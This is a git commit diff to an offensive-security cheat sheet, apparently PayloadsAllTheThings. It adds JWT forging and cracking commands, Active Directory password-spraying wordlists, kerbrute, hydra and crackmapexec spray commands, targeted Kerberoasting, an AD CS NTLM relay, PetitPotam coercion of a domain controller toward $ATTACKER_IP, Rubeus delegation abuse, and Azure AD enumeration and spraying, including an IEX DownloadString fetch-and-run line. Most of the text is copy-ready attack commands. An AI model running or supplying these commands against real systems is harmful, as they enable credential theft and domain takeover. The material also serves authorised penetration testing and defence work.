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DB2 Injection + ADCS

This commit is contained in:
Swissky 2021-08-10 23:00:19 +02:00
parent 01f2a02c52
commit 87be30d3b2
11 changed files with 1426 additions and 420 deletions

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@ -6,6 +6,8 @@
- [Tools](#tools)
- [JWT Format](#jwt-format)
- [Header](#header)
- [Payload](#payload)
- [JWT Signature - None algorithm](#jwt-signature---none-algorithm)
- [JWT Signature - RS256 to HS256](#jwt-signature---rs256-to-hs256)
- [Breaking JWT's secret](#breaking-jwts-secret)
@ -188,6 +190,7 @@ First, bruteforce the "secret" key used to compute the signature.
git clone https://github.com/ticarpi/jwt_tool
python3 -m pip install termcolor cprint pycryptodomex requests
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
\ \ \ \ \ \
@ -249,6 +252,13 @@ Your new forged token:
[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
* Recon: `python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`
* Scanning: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb`
* Exploitation: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
* Fuzzing: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt`
* Review: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
### JWT cracker
@ -266,6 +276,14 @@ Secret is "Sn1f"
## CVE
* CVE-2015-2951 - The alg=none signature-bypass vulnerability
* CVE-2016-10555 - The RS/HS256 public key mismatch vulnerability
* CVE-2018-0114 - Key injection vulnerability
* CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability
* CVE-2020-28042 - Null signature vulnerability
## References
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)

View File

@ -81,6 +81,8 @@
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
- [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation)
- [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation)
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
@ -1058,65 +1060,64 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are :
- P@ssw0rd01, Password123, mimikatz
- P@ssw0rd01, Password123, Password1, Hello123, mimikatz
- Welcome1/Welcome01
- $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
- SeasonYear : Winter2019*, Spring2020!, Summer2018?, Summer2020, July2020!
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
#### Kerberos pre-auth bruteforcing
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
# Username bruteforce
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc usernames.txt
# Password brute
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc rockyou.txt username
# Password spray
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc domain_users.txt Password123
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc domain_users.txt rockyou.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
* Username bruteforce
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc usernames.txt
* Password bruteforce
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc rockyou.txt username
* Password spray
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc domain_users.txt Password123
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc domain_users.txt rockyou.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
#### Spray a pre-generated passwords list
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
crackmapexec smb -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
Using `DomainPasswordSpray` to spray a password against all users of a domain.
# https://github.com/dafthack/DomainPasswordSpray
Invoke-DomainPasswordSpray -Password Summer2021!
# /!\ be careful with the account lockout !
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
crackmapexec smb -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
* Using `DomainPasswordSpray` to spray a password against all users of a domain.
# https://github.com/dafthack/DomainPasswordSpray
Invoke-DomainPasswordSpray -Password Summer2021!
# /!\ be careful with the account lockout !
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
* Using `SMBAutoBrute`.
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
#### Spray passwords against the RDP service
Using RDPassSpray to target RDP services.
git clone https://github.com/xFreed0m/RDPassSpray
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
Using hydra and ncrack to target RDP services.
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://
* Using RDPassSpray to target RDP services.
git clone https://github.com/xFreed0m/RDPassSpray
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
* Using hydra and ncrack to target RDP services.
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://
#### BadPwdCount attribute
@ -1411,6 +1412,13 @@ Any valid domain user can request a kerberos ticket (TGS) for any domain service
./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
* [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast)
# for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute),
# print the "kerberoast" hash, and delete the temporary SPN set for that operation
targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]
Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
@ -1765,13 +1773,15 @@ Terminal> psexec.py 'LAB/winrm_user_1:Password123!@'
#### AD CS Relay Attack
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controllers NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
* Version 1: NTLM Relay + Rubeus + PetitPotam
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
impacket> python3 ./examples/ntlmrelayx.py -t -smb2support --adcs --template workstation
# template workstation, DomainController, Machine
# Templates: workstation, DomainController, Machine; KerberosAuthentication
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
@ -2289,6 +2299,22 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
* Ensure sensitive accounts cannot be delegated
* Disable the Print Spooler Service
#### MS-EFSRPC Abuse with Unconstrained Delegation
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
# Coerce the callback
git clone https://github.com/topotam/PetitPotam
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
# Extract the ticket
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
### Kerberos Constrained Delegation
> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
@ -2303,25 +2329,19 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
#### Exploit with Impacket
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
#### Exploit the Constrained Delegation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
#### Exploit with Rubeus
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
$ dir \\dc.domain.com\c$
* Impacket
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip
* Rubeus
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
$ dir \\dc.domain.com\c$
#### Impersonate a domain user on a resource
@ -2851,4 +2871,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work)
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
* [Microsoft ADCS Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)

View File

@ -1,29 +1,157 @@
# Azure
# Azure Active Directory
## Summary
* [Tools](#tools)
* [Azure Architecture](#azure-architecture)
* [Azure Storage Account - Access](#azure-storage-account----access)
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
* [Azure AD - Enumeration](#azure-ad---enumeration)
* [Azure AD - Password Spray](#azure-ad---password-spray)
* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
* [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
* [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket)
* [Azure AD - ADFS Federation Server ~Cloud Kerberos](#azure-ad---adfs-federation-server-cloud-kerberos)
* [Azure AD - Persistence via Automation accounts](#azure-ad---persistence-via-automation-accounts)
* [Azure VM - Execute command as NT SYSTEM with Contributor right](#azure-vm---execute-command-as-nt-system-with-contributor-right)
* [Office365 - Enumerating Users](#office365---enumerating-users)
* [Azure Recon Tools](#azure-recon-tools)
* [Enumeration](#enumeration)
* [Enumerate valid emails](#enumerate-valid-emails)
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
* [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell)
* [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell)
* [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
* [Enumerate manually](#enumerate-manually)
* [Enumeration methodology](#enumeration-methodology)
* [Phishing with Evilginx2](#phishing-with-evilginx2)
* [Illicit Consent Grant](#illicit-consent-grant)
* [Token from Managed Identity](#token-from-managed-identity)
* [Azure API via Powershell](#azure-api-via-powershell)
* [Azure API via Python Version](#azure-api-via-python-version)
* [Get Tokens](#get-tokens)
* [Use Tokens](#use-tokens)
* [Refresh Tokens](#refresh-token)
* [Stealing Tokens](#stealing-tokens)
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications)
* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app)
* [Azure Storage Blob](#azure-storage-blob)
* [Enumerate blobs](#enumerate-blobs)
* [SAS URL](#sas-url)
* [List and download blobs](#list-and-download-blobs)
* [Runbook Automation](#runbook-automation)
* [Create a Runbook](#create-a-runbook)
* [Persistence via Automation accounts](#persistence-via-automation-accounts)
* [Virtual Machine RunCommand](#virtual-machine-runcommand)
* [KeyVault Secrets](#keyvault-secrets)
* [Pass The Certificate](#pass--the-certificate)
* [Pass The PRT](#pass-the-prt)
* [Intunes Administration](#intunes-administration)
* [Dynamic Group Membership](#dynamic-group-membership)
* [Administrative Unit](#administrative-unit)
* [Deployment Template](#deployment-template)
* [Application Proxy](#application-proxy)
* [Conditional Access](#conditional-access)
* [Azure AD](#azure-ad)
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
* [Password Spray](#password-spray)
* [Convert GUID to SID](#convert-guid-to-sid)
* [Azure AD Connect ](#azure-ad-connect)
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
* [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket)
* [References](#references)
## Tools
## Azure Recon Tools
:warning: 16 apr 2019 : BloodHound does not support any analysis with AzureAD.
:warning: Tokens for Azure are cached in `C:\Users\[Name]\.Azure\accessTokens.json`
* **ROADTool**
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
* **StormSpotter**
# https://github.com/Azure/Stormspotter
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
* **Azure Hound**
# https://github.com/BloodHoundAD/AzureHound
. C:\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose
# GUI access
Username: neo4j
Password: BloodHound
# Cypher query example:
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
# Change object ID's to names in Bloodhound
MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
# Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/
* List of Microsoft portals: https://msportals.io/
* **Azucar** : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
* **Azurite Explorer** and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
git clone https://github.com/mwrlabs/Azurite.git
git clone https://github.com/FSecureLABS/Azurite
git submodule init
git submodule update
PS> Import-Module AzureRM
PS> Import-Module AzuriteExplorer.ps1
PS> Review-AzureRmSubscription
PS> Review-CustomAzureRmSubscription
* **MicroBurst** - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
$ git clone https://github.com/NetSPI/MicroBurst
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
* **SkyArk** - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
- Read-Only permissions over Azure Directory (Tenant)
- Read-Only permissions over Subscription
- Require AZ and AzureAD module or administrator right
$ git clone https://github.com/cyberark/SkyArk
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Import-Module .\SkyArk.ps1 -force
PS C> Start-AzureStealth
or in the Cloud Console
PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
PS C> Scan-AzureAdmins
* **PowerZure** -
require az module !
@ -46,113 +174,755 @@
# Administrator
$ Create-Backdoor, Execute-Backdoor
## Enumeration
* **Azure CLI** - Default azure CLI
### Enumerate valid emails
> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Validate email
$ AZ_REPO=$(lsb_release -cs) echo "deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
$ curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
$ sudo apt-get install apt-transport-https
$ sudo apt-get update && sudo apt-get install azure-cli
# dump users
$ az ad user list --output=table --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}'
PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
admin@<TENANT NAME>.onmicrosoft.com - VALID
root@<TENANT NAME>.onmicrosoft.com - INVALID
test@<TENANT NAME>.onmicrosoft.com - VALID
contact@<TENANT NAME>.onmicrosoft.com - INVALID
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
* **MicroBurst** - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
$ git clone https://github.com/NetSPI/MicroBurst
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
#### Password spraying
* **SkyArk** - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
- Read-Only permissions over Azure Directory (Tenant)
- Read-Only permissions over Subscription
- Require AZ and AzureAD module or administrator right
$ git clone https://github.com/cyberark/SkyArk
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Import-Module .\SkyArk.ps1 -force
PS C> Start-AzureStealth
or in the Cloud Console
PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
PS C> Scan-AzureAdmins
* **Azurite Explorer** and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
git clone https://github.com/mwrlabs/Azurite.git
git clone https://github.com/FSecureLABS/Azurite
git submodule init
git submodule update
PS> Import-Module AzureRM
PS> Import-Module AzuriteExplorer.ps1
PS> Review-AzureRmSubscription
PS> Review-CustomAzureRmSubscription
* **Azucar** : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
## Azure Architecture
![Azure Architecture](https://miro.medium.com/max/880/0*-5NqtHX2C8arkwQG)
* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large
## Azure Storage Account - Access
* Blobs *.blob.core.windows.net
$ AzCopy /Source:https://myaccount.blob.core.windows.net/mycontainer /Dest:C:\myfolder /SourceKey:key /S
* File Services *.file.core.windows.net
* Data Tables *.table.core.windows.net
* Queues *.queue.core.windows.net
# https://github.com/NetSPI/MicroBurst
S C:\> Invoke-EnumerateAzureBlobs -Base secure [-BingAPIKey 12345678901234567899876543210123]
Found Storage Account - secure.blob.core.windows.net
PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
### Enumerate Azure Subdomains
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
### Enumerate tenant with Azure AD Powershell
Import-Module C:\Tools\AzureAD\AzureAD.psd1
Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzureAD -Credential $creds
PS AzureAD> Get-AzureADUser -All $true
PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName
PS AzureAD> Get-AzureADGroup -All $true
PS AzureAD> Get-AzureADDevice
PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
### Enumerate tenant with Az Powershell
PS> $passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential ("test@<TENANT NAME>.onmicrosoft.com", $passwd)
PS Az> Connect-AzAccount -Credential $creds
PS Az> Get-AzResource
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
PS Az> Get-AzVM | fl
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
PS Az> Get-AzFunctionApp
PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault
### Enumerate tenant with az cli
PS> az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
PS> az vm list
PS> az vm list --query "[].[name]" -o table
PS> az webapp list
PS> az functionapp list --query "[].[name]" -o table
PS> az storage account list
PS> az keyvault list
### Enumerate manually
* Federation with Azure AD or O365
https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
* Get the Tenant ID
https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
## Enumeration methodology
# Check Azure Joined
PS> dsregcmd.exe /status
| Device State |
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
# Enumerate resources
PS Az> Get-AzResource
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>`
# Get info on a role
PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get info user
PS AzureAD> Get-AzureADUser -ObjectId <ID>
PS AzureAD> Get-AzureADUser -ObjectId test@<TENANT NAME>.onmicrosoft.com | fl *
# List all groups
PS AzureAD> Get-AzureADGroup -All $true
# Get members of a group
PS Az> Get-AzADGroup -DisplayName '<GROUP-NAME>'
PS Az> Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName
# Get Azure AD information
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
PS AADInternals> Get-AADIntLoginInformation -UserName admin@<TENANT NAME>.onmicrosoft.com
PS AADInternals> Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com # Get Tenant ID
PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> # Get all the information
# Check if there is a user logged-in to az cli
PS> az ad signed-in-user show
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Get all details about an application
PS AzureAD> Get-AzureADApplication -ObjectId <ID> | fl *
# List all VM's the user has access to
PS Az> Get-AzVM
PS Az> Get-AzVM | fl
# Get all function apps
PS Az> Get-AzFunctionApp
# Get all webapps
PS Az> Get-AzWebApp
PS Az> Get-AzWebApp | select-object Name, Type, Hostnames
# List all storage accounts
PS Az> Get-AzStorageAccount
PS Az> Get-AzStorageAccount | fl
